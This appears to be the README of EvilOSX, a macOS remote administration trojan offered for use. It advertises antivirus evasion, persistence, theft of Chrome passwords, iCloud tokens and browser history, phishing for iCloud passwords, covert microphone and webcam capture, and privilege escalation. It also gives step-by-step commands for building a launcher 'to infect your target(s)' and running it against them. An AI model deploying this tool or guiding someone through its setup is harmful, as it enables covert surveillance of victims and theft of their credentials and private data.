An evil RAT (Remote Administration Tool) for macOS / OS X.

Features

• Emulate a terminal instance
• Simple extendable module system
• No bot dependencies (pure python)
• Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
• Persistent
• GUI and CLI support
• Retrieve Chrome passwords
• Retrieve iCloud tokens and contacts
• Retrieve/monitor the clipboard
• Retrieve browser history (Chrome and Safari)
• Phish for iCloud passwords via iTunes
• iTunes (iOS) backup enumeration
• Record the microphone
• Take a desktop screenshot or picture using the webcam
• Attempt to get root via local privilege escalation

<svg class="octicon octicon-link" viewBox="0 0 16 16" width="16" height="16" aria-hidden="true"></svg>How To Use

# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

<svg class="octicon octicon-link" viewBox="0 0 16 16" width="16" height="16" aria-hidden="true"></svg>Advanced users

There's also a CLI for those who want to use this over SSH:

# Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s)

<svg class="octicon octicon-link" viewBox="0 0 16 16" width="16" height="16" aria-hidden="true"></svg>Screenshots

EvilOSX - pure python, post-exploitation, RAT

- https://github.com/Marten4n6/EvilOSX